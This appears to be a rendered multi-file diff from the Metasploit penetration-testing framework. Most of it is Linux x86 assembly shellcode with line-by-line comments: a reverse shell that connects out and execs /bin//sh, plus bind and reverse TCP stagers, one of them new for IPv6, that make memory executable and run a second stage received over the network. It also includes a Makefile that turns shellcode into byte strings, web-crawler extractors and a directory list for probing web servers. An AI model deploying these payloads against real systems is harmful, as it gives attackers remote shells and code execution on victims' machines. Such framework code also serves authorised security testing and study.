@ -114,7 +114,8 @@ public abstract class RpcConnection {
|
|||
* @throws IOException
|
||||
*/
|
||||
protected void disconnect() throws SocketException, IOException{
|
||||
connection.close();
|
||||
if(connection != null)
|
||||
connection.close();
|
||||
}
|
||||
|
||||
/**
|
||||
|
|
|
@ -0,0 +1,7 @@
|
|||
This directory must be populated with the libs and includes for the commercial
|
||||
Packet SDK in order for the sniffer extension to build. This SDK is not
|
||||
publicly available at this time.
|
||||
|
||||
The 32-bit lib should be copied to win32/pssdk.lib
|
||||
The 64-bit lib should be copied to win64/pssdk.lib
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
STAGERS=stager_sock_bind stager_sock_bind_udp stager_sock_bind_icmp \
|
||||
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
|
||||
stager_egghunt stager_sock_find stager_sock_reverse \
|
||||
stager_sock_reverse_icmp stager_sock_reverse_udp \
|
||||
stager_sock_reverse_udp_dns
|
||||
|
@ -30,8 +30,22 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
|
|||
sed -e 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' \
|
||||
-e 's/^/"/;s/$$/"/;$$ b;s/$$/+/;' > $@
|
||||
|
||||
# ljust(23) because the longest instruction is usually 5 bytes which takes 22
|
||||
# characters including quotes
|
||||
%.disasm: %.bin
|
||||
@ndisasm -b 32 $< > $@
|
||||
@ndisasm -b 32 $< > $*.tmp
|
||||
@ruby -p -a -e ' \
|
||||
$$F.shift; \
|
||||
$$F[0].tap { |s| \
|
||||
s.tr! "A-F", "a-f"; \
|
||||
t=s.dup; \
|
||||
s.clear; \
|
||||
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
|
||||
STDIN.eof? ? s<< " # " : s<< "+# "; \
|
||||
}; \
|
||||
$$_ = $$F.join(" ") + "\n"; \
|
||||
' < $*.tmp > $@
|
||||
@rm $*.tmp
|
||||
|
||||
$(SINGLE) $(STAGES) $(STAGERS): %: %.o
|
||||
@echo "Building $@... (`wc -c $(<:.o=.bin)|awk '{print $$1}'` bytes)"
|
||||
|
|
|
@ -31,49 +31,52 @@ GLOBAL _start
|
|||
|
||||
_start:
|
||||
xor ebx, ebx
|
||||
mul ebx
|
||||
|
||||
socket:
|
||||
push ebx
|
||||
inc ebx
|
||||
push ebx
|
||||
push byte 0x2
|
||||
push byte 0x66
|
||||
pop eax
|
||||
mov ecx, esp
|
||||
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
|
||||
inc ebx ; 1 = SYS_SOCKET
|
||||
push ebx ; type = 1 = SOCK_STREAM
|
||||
push byte 0x2 ; domain = 2 = AF_INET
|
||||
mov ecx, esp ; socketcall args
|
||||
mov al, 0x66
|
||||
int 0x80
|
||||
xchg eax, ebx
|
||||
|
||||
; int dup2(int oldfd, int newfd);
|
||||
dup:
|
||||
pop ecx
|
||||
pop ecx ; oldfd = 2, aka stderr
|
||||
; newfd is in ebx, set above, and doesn't change until we're ready to call
|
||||
; connect(2)
|
||||
dup_loop:
|
||||
mov al, 0x3f
|
||||
mov al, 0x3f ; __NR_dup2
|
||||
int 0x80
|
||||
dec ecx
|
||||
jns dup_loop
|
||||
|
||||
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
connect:
|
||||
pop ebx
|
||||
pop edx
|
||||
push dword 0x0100007f
|
||||
push word 0xbfbf
|
||||
inc ebx
|
||||
push bx
|
||||
mov ecx, esp
|
||||
mov al, 0x66
|
||||
push eax
|
||||
push ecx
|
||||
push ebx
|
||||
mov ecx, esp
|
||||
inc ebx
|
||||
push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
|
||||
push 0xbfbf0002 ; addr->sin_port = 49087
|
||||
; addr->sin_family = 2 = AF_INET
|
||||
mov ecx, esp ; ecx = addr
|
||||
mov al, 0x66 ; __NR_socketcall
|
||||
push eax ; addrlen
|
||||
push ecx ; addr
|
||||
push ebx ; sockfd
|
||||
mov bl, 0x3 ; 3 = SYS_CONNECT
|
||||
mov ecx, esp ; socketcall args
|
||||
int 0x80
|
||||
|
||||
; int execve(const char *filename, char *const argv[], char *const envp[]);
|
||||
execve:
|
||||
push edx
|
||||
push edx ; NULL terminator for "/bin//sh"
|
||||
push dword 0x68732f2f
|
||||
push dword 0x6e69622f
|
||||
mov ebx, esp
|
||||
push edx
|
||||
push ebx
|
||||
mov ecx, esp
|
||||
mov al, 0x0b
|
||||
mov ebx, esp ; filename
|
||||
push edx ; NULL terminator for argv
|
||||
push ebx ; pointer to "/bin//sh"
|
||||
mov ecx, esp ; argv = pointer to pointer to "/bin//sh"
|
||||
mov al, 0x0b ; __NR_execve
|
||||
int 0x80
|
||||
|
||||
|
|
|
@ -1,14 +1,16 @@
|
|||
;;
|
||||
;
|
||||
;
|
||||
; Name: stager_sock_bind
|
||||
; Qualities: Can Have Nulls
|
||||
; Version: $Revision: 1607 $
|
||||
; License:
|
||||
; License:
|
||||
;
|
||||
; This file is part of the Metasploit Exploit Framework
|
||||
; and is subject to the same licenses and copyrights as
|
||||
; the rest of this package.
|
||||
;
|
||||
; With enhancements from the unixasm project by Ramon de Carvalho Valle
|
||||
;
|
||||
; Description:
|
||||
;
|
||||
; Implementation of a Linux portbind TCP stager.
|
||||
|
@ -32,56 +34,89 @@ BITS 32
|
|||
GLOBAL _start
|
||||
|
||||
_start:
|
||||
xor ebx, ebx
|
||||
|
||||
socket:
|
||||
push ebx
|
||||
inc ebx
|
||||
push ebx
|
||||
push byte 0x2
|
||||
push byte 0x66
|
||||
; int mprotect(const void *addr, size_t len, int prot);
|
||||
mprotect:
|
||||
push byte 0x7d ; __NR_mprotect
|
||||
pop eax
|
||||
cdq
|
||||
mov ecx, esp
|
||||
mov dl, 0x7 ; prot = 7 = PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
mov ecx, 0x1000 ; len = PAGE_SIZE (on most systems)
|
||||
mov ebx, esp ; addr
|
||||
and bx, 0xf000 ; ensure that addr is page-aligned
|
||||
int 0x80
|
||||
xchg eax, esi
|
||||
|
||||
xor ebx, ebx ; ebx is the call argument to socketcall
|
||||
mul ebx ; set edx:eax to 0, we'll need them in a minute
|
||||
|
||||
; int socket(int domain, int type, int protocol);
|
||||
socket:
|
||||
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
|
||||
inc ebx ; 1 = SYS_SOCKET
|
||||
push ebx ; type = 1 = SOCK_STREAM
|
||||
push byte 0x2 ; domain = 2 = AF_INET
|
||||
mov ecx, esp ; socketcall args
|
||||
mov al, 0x66 ; __NR_socketcall
|
||||
int 0x80
|
||||
; Server socket is now in eax. We'll push it to the stack in a sec and then
|
||||
; just reference it from there, no need to store it in a register
|
||||
|
||||
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
bind:
|
||||
inc ebx
|
||||
push edx
|
||||
push word 0xbfbf ; port: 49087
|
||||
push bx
|
||||
mov ecx, esp
|
||||
push byte 0x66
|
||||
pop ebx ; 2 = SYS_BIND (this was PF_INET for the call to socket)
|
||||
pop esi ; 1 = junk - this keeps ecx pointing to the right place
|
||||
; set up the sockaddr
|
||||
push edx ; addr->sin_addr = 0 = inet_addr("0.0.0.0")
|
||||
push 0xbfbf0002 ; addr->sin_port = 0xbfbf
|
||||
; addr->sin_family = 2 = AF_INET
|
||||
push byte 0x10 ; addrlen
|
||||
push ecx ; addr (ecx still points to the right place on the stack)
|
||||
push eax ; sockfd ; return value from socket(2) above
|
||||
mov ecx, esp ; socketcall args
|
||||
push byte 0x66 ; __NR_socketcall
|
||||
pop eax
|
||||
push eax
|
||||
push ecx
|
||||
push esi
|
||||
mov ecx, esp
|
||||
int 0x80
|
||||
|
||||
listen:
|
||||
mov al, 0x66
|
||||
shl ebx, 1
|
||||
shl ebx, 1 ; 4 = SYS_LISTEN
|
||||
mov al, 0x66 ; __NR_socketcall
|
||||
int 0x80
|
||||
|
||||
; At this point the stack will look like this:
|
||||
;
|
||||
; [ sockfd ] <-- esp, ecx
|
||||
; [ addr ] # pointer to below on the stack
|
||||
; [ addrlen = 0x66 ]
|
||||
; [ 0xbfbf0002 ] <-- *addr
|
||||
; [ 0x00000000 ] inet_addr("0.0.0.0")
|
||||
;
|
||||
; Since addrlen is ignored if addr is null, we can set esp+4 to NULL and use
|
||||
; the sockfd that's already on the stack as an argument to accept(2), thus
|
||||
; avoiding having to set up a full list of args. Conveniently,
|
||||
; mov [ecx+4], edx
|
||||
; is three bytes long, whereas the old sequence:
|
||||
; push edx ; addr = NULL
|
||||
; push edx ; addrlen = NULL
|
||||
; push esi ; sockfd
|
||||
; mov ecx, esp ; socketcall args
|
||||
; weighs in at 5
|
||||
|
||||
|
||||
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
|
||||
accept:
|
||||
push edx
|
||||
push edx
|
||||
push esi
|
||||
inc ebx
|
||||
mov ecx, esp
|
||||
mov al, 0x66
|
||||
inc ebx ; 5 = SYS_ACCEPT
|
||||
mov al, 0x66 ; __NR_socketcall
|
||||
mov [ecx+4], edx
|
||||
int 0x80
|
||||
xchg eax, ebx
|
||||
xchg eax, ebx ; client socket is now in ebx
|
||||
|
||||
%ifndef USE_SINGLE_STAGE
|
||||
|
||||
read:
|
||||
recv:
|
||||
mov dh, 0xc
|
||||
mov al, 0x3
|
||||
int 0x80
|
||||
mov edi, ebx ; not necessary if second stages use ebx instead of edi
|
||||
mov edi, ebx ; not necessary if second stages use ebx instead of edi
|
||||
; for fd
|
||||
jmp ecx
|
||||
|
||||
|
|
|
@ -0,0 +1,113 @@
|
|||
;;
|
||||
;
|
||||
; Name: stager_sock_bind6
|
||||
; Qualities: Can Have Nulls
|
||||
; Version: $Revision: 1607 $
|
||||
; License:
|
||||
;
|
||||
; This file is part of the Metasploit Exploit Framework
|
||||
; and is subject to the same licenses and copyrights as
|
||||
; the rest of this package.
|
||||
;
|
||||
; Description:
|
||||
;
|
||||
; Implementation of a Linux portbind TCP stager.
|
||||
;
|
||||
; File descriptor in edi.
|
||||
;
|
||||
; Meta-Information:
|
||||
;
|
||||
; meta-shortname=Linux Bind TCP Stager
|
||||
; meta-description=Listen on a port for a connection and run a second stage
|
||||
; meta-authors=skape <mmiller [at] hick.org>; egypt <egypt [at] metasploit.com>
|
||||
; meta-os=linux
|
||||
; meta-arch=ia32
|
||||
; meta-category=stager
|
||||
; meta-connection-type=bind
|
||||
; meta-name=bind_ipv6_tcp
|
||||
; meta-path=lib/Msf/PayloadComponent/Linux/ia32/BindStager.pm
|
||||
;;
|
||||
BITS 32
|
||||
GLOBAL _start
|
||||
|
||||
_start:
|
||||
|
||||
; int mprotect(const void *addr, size_t len, int prot);
|
||||
mprotect:
|
||||
push byte 0x7d ; __NR_mprotect
|
||||
pop eax
|
||||
cdq
|
||||
mov dl, 0x7 ; prot = 7 = PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
mov ecx, 0x1000 ; len = PAGE_SIZE (on most systems)
|
||||
mov ebx, esp ; addr
|
||||
and bx, 0xf000 ; ensure that addr is page-aligned
|
||||
int 0x80
|
||||
|
||||
xor ebx, ebx ; ebx is the call argument to socketcall
|
||||
mul ebx ; set edx:eax to 0, we'll need them in a minute
|
||||
|
||||
; int socket(int domain, int type, int protocol);
|
||||
socket:
|
||||
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
|
||||
inc ebx ; 1 = SYS_SOCKET
|
||||
push ebx ; type = 1 = SOCK_STREAM
|
||||
push byte 0xa ; domain = 0xa = AF_INET6
|
||||
mov ecx, esp ; socketcall args
|
||||
mov al, 0x66 ; __NR_socketcall
|
||||
int 0x80
|
||||
; Server socket is now in eax. We'll push it to the stack in a sec and then
|
||||
; just reference it from there, no need to store it in a register
|
||||
|
||||
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
bind:
|
||||
inc ebx ; 2 = SYS_BIND (this was PF_INET for the call to socket)
|
||||
; set up the sockaddr
|
||||
|
||||
push edx ; addr->sin6_scopeid = 0
|
||||
push edx ; addr->sin6_addr = inet_pton("::0")
|
||||
push edx ; ...
|
||||
push edx ; ...
|
||||
push edx ; ...
|
||||
push edx ; addr->flowinfo = 0
|
||||
push 0xbfbf000a ; addr->sin6_port = 0xbfbf
|
||||
; addr->sin6_family = 0xa = AF_INET6
|
||||
mov ecx, esp ; socketcall args
|
||||
push byte 0x1c ; addrlen
|
||||
push ecx ; addr
|
||||
push eax ; sockfd ; return value from socket(2) above
|
||||
mov ecx, esp ; socketcall args
|
||||
push byte 0x66 ; __NR_socketcall
|
||||
pop eax
|
||||
int 0x80
|
||||
|
||||
listen:
|
||||
shl ebx, 1 ; 4 = SYS_LISTEN
|
||||
mov al, 0x66 ; __NR_socketcall
|
||||
int 0x80
|
||||
|
||||
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
|
||||
accept:
|
||||
inc ebx ; 5 = SYS_ACCEPT
|
||||
mov al, 0x66 ; __NR_socketcall
|
||||
mov [ecx+4], edx
|
||||
int 0x80
|
||||
xchg eax, ebx
|
||||
|
||||
%ifndef USE_SINGLE_STAGE
|
||||
|
||||
; ssize_t read(int fd, void *buf, size_t count);
|
||||
recv:
|
||||
; fd = ebx
|
||||
; buf = ecx is pointing somewhere in the stack
|
||||
mov dh, 0xc ; count = 0xc00
|
||||
mov al, 0x3 ; __NR_read
|
||||
int 0x80
|
||||
mov edi, ebx ; not necessary if second stages use ebx instead of edi
|
||||
; for fd
|
||||
jmp ecx
|
||||
|
||||
%else
|
||||
%ifdef FD_REG_EDI
|
||||
mov edi, ebx
|
||||
%endif
|
||||
%endif
|
|
@ -26,48 +26,62 @@
|
|||
; meta-connection-type=reverse
|
||||
; meta-name=reverse_tcp
|
||||
; meta-basemod=Msf::PayloadComponent::ReverseConnection
|
||||
; meta-offset-lhost=0x11
|
||||
; meta-offset-lport=0x17
|
||||
; meta-offset-lhost=0x12
|
||||
; meta-offset-lport=0x19
|
||||
;;
|
||||
BITS 32
|
||||
GLOBAL _start
|
||||
|
||||
_start:
|
||||
xor ebx, ebx
|
||||
mul ebx
|
||||
|
||||
; int socket(int domain, int type, int protocol);
|
||||
socket:
|
||||
push ebx
|
||||
inc ebx
|
||||
push ebx
|
||||
push byte 0x2
|
||||
push byte 0x66
|
||||
pop eax
|
||||
mov ecx, esp
|
||||
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
|
||||
inc ebx ; 1 = SYS_SOCKET
|
||||
push ebx ; type = 1 = SOCK_STREAM
|
||||
push byte 0x2 ; domain = 2 = AF_INET
|
||||
mov al, 0x66 ; __NR_socketcall
|
||||
mov ecx, esp ; socketcall args
|
||||
int 0x80
|
||||
xchg eax, edi
|
||||
|
||||
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
connect:
|
||||
pop ebx
|
||||
push dword 0x0100007f ; ip: 127.0.0.1
|
||||
push word 0xbfbf ; port: 49087
|
||||
push bx
|
||||
mov ecx, esp
|
||||
push byte 0x66
|
||||
push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
|
||||
push 0xbfbf0002 ; addr->sin_port = 49087
|
||||
; addr->sin_family = 2 = AF_INET
|
||||
mov ecx, esp ; ecx = addr
|
||||
push byte 0x66 ; __NR_socketcall
|
||||
pop eax
|
||||
push eax
|
||||
push ecx
|
||||
push edi
|
||||
mov ecx, esp
|
||||
inc ebx
|
||||
push eax ; addrlen
|
||||
push ecx ; addr
|
||||
push edi ; sockfd
|
||||
mov ecx, esp ; socketcall args
|
||||
inc ebx ; 3 = SYS_CONNECT
|
||||
int 0x80
|
||||
|
||||
%ifndef USE_SINGLE_STAGE
|
||||
|
||||
; int mprotect(const void *addr, size_t len, int prot);
|
||||
mprotect:
|
||||
mov dl, 0x7 ; prot = 7 = PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
mov ecx, 0x1000 ; len = PAGE_SIZE (on most systems)
|
||||
mov ebx, esp ; addr
|
||||
shr ebx, 12 ; ensure that addr is page-aligned
|
||||
shl ebx, 12
|
||||
mov al, 0x7d ; __NR_mprotect
|
||||
int 0x80
|
||||
|
||||
; ssize_t read(int fd, void *buf, size_t count);
|
||||
recv:
|
||||
pop ebx
|
||||
pop ebx ; sockfd
|
||||
mov ecx, esp ; buf
|
||||
cdq
|
||||
mov dh, 0xc
|
||||
mov al, 0x3
|
||||
mov dh, 0xc ; count = 0xc00
|
||||
mov al, 0x3 ; __NR_read
|
||||
int 0x80
|
||||
jmp ecx
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@ require 'anemone/storage/base'
|
|||
|
||||
module Anemone
|
||||
|
||||
VERSION = '0.5.0';
|
||||
VERSION = '0.5.0'
|
||||
|
||||
#
|
||||
# Convenience method to start a crawl
|
||||
|
@ -48,7 +48,7 @@ module Anemone
|
|||
:cookies => nil,
|
||||
# basic authentication data to send with HTTP requests
|
||||
:http_basic_auth => nil,
|
||||
# array or raw header lines to inject into each request
|
||||
# array or raw header lines to inject into each request
|
||||
:inject_headers => [],
|
||||
# accept cookies from the server and send them back?
|
||||
:accept_cookies => false,
|
||||
|
@ -77,7 +77,7 @@ module Anemone
|
|||
@skip_link_patterns = []
|
||||
@after_crawl_blocks = []
|
||||
@opts = opts
|
||||
|
||||
|
||||
yield self if block_given?
|
||||
end
|
||||
|
||||
|
@ -277,7 +277,7 @@ module Anemone
|
|||
false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Returns +true+ if *link* should not be visited because
|
||||
# it has a query string and +skip_query_strings+ is true.
|
||||
|
@ -301,6 +301,6 @@ module Anemone
|
|||
@tentacles.each {|t| t.kill rescue nil }
|
||||
@pages = nil
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,7 @@
|
|||
class Anemone::Extractors::Anchors < Anemone::Extractors::Base
|
||||
|
||||
def run
|
||||
doc.search( '//a[@href]' ).map { |a| a['href'] }
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,12 @@
|
|||
class Anemone::Extractors::Dirbuster < Anemone::Extractors::Base
|
||||
|
||||
def run
|
||||
return [] if page.code.to_i != 200
|
||||
|
||||
@@dirs ||= nil
|
||||
|
||||
return @@dirs if @@dirs
|
||||
@@dirs = IO.read( File.dirname( __FILE__ ) + '/dirbuster/directories' ).split( "\n" )
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,10 @@
|
|||
test/
|
||||
tmp/
|
||||
stuff/
|
||||
awstats/
|
||||
awstats/awstats/
|
||||
basilic/
|
||||
cacti/
|
||||
docs/text/manual.txt
|
||||
docs/CHANGELOG
|
||||
docs/html/php_script_server.html
|
|
@ -0,0 +1,7 @@
|
|||
class Anemone::Extractors::Forms < Anemone::Extractors::Base
|
||||
|
||||
def run
|
||||
doc.search( '//form[@action]' ).map { |a| a['action'] }
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,7 @@
|
|||
class Anemone::Extractors::Frames < Anemone::Extractors::Base
|
||||
|
||||
def run
|
||||
doc.css( 'frame', 'iframe' ).map { |a| a.attributes['src'].content rescue next }
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,50 @@
|
|||
require 'uri'
|
||||
|
||||
class Anemone::Extractors::Generic < Anemone::Extractors::Base
|
||||
|
||||
def run
|
||||
URI.extract( doc.to_s, %w(http https) ).map do |u|
|
||||
#
|
||||
# This extractor needs to be a tiny bit intelligent because
|
||||
# due to its generic nature it'll inevitably match some garbage.
|
||||
#
|
||||
# For example, if some JS code contains:
|
||||
#
|
||||
# var = 'http://blah.com?id=1'
|
||||
#
|
||||
# or
|
||||
#
|
||||
# var = { 'http://blah.com?id=1', 1 }
|
||||
#
|
||||
#
|
||||
# The URI.extract call will match:
|
||||
#
|
||||
# http://blah.com?id=1'
|
||||
#
|
||||
# and
|
||||
#
|
||||
# http://blah.com?id=1',
|
||||
#
|
||||
# respectively.
|
||||
#
|
||||
if !includes_quotes?( u )
|
||||
u
|
||||
else
|
||||
if html.include?( "'#{u}" )
|
||||
u.split( '\'' ).first
|
||||
elsif html.include?( "\"#{u}" )
|
||||
u.split( '"' ).first
|
||||
else
|
||||
u
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue
|
||||
[]
|
||||
end
|
||||
|
||||
def includes_quotes?( url )
|
||||
url.include?( '\'' ) || url.include?( '"' )
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,7 @@
|
|||
class Anemone::Extractors::Links < Anemone::Extractors::Base
|
||||
|
||||
def run
|
||||
doc.search( "//link[@href]" ).map { |a| a['href'] }
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,24 @@
|
|||
class Anemone::Extractors::MetaRefresh < Anemone::Extractors::Base
|
||||
|
||||
def run
|
||||
doc.search( "//meta[@http-equiv='refresh']" ).map do |url|
|
||||
begin
|
||||
_, url = url['content'].split( ';', 2 )
|
||||
next if !url
|
||||
unquote( url.split( '=', 2 ).last )
|
||||
rescue
|
||||
next
|
||||
end
|
||||
end
|
||||
rescue
|
||||
nil
|
||||
end
|
||||
|
||||
def unquote( str )
|
||||
[ '\'', '"' ].each do |q|
|
||||
return str[1...-1] if str.start_with?( q ) && str.end_with?( q )
|
||||
end
|
||||
str
|
||||
end
|
||||
|
||||
end
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue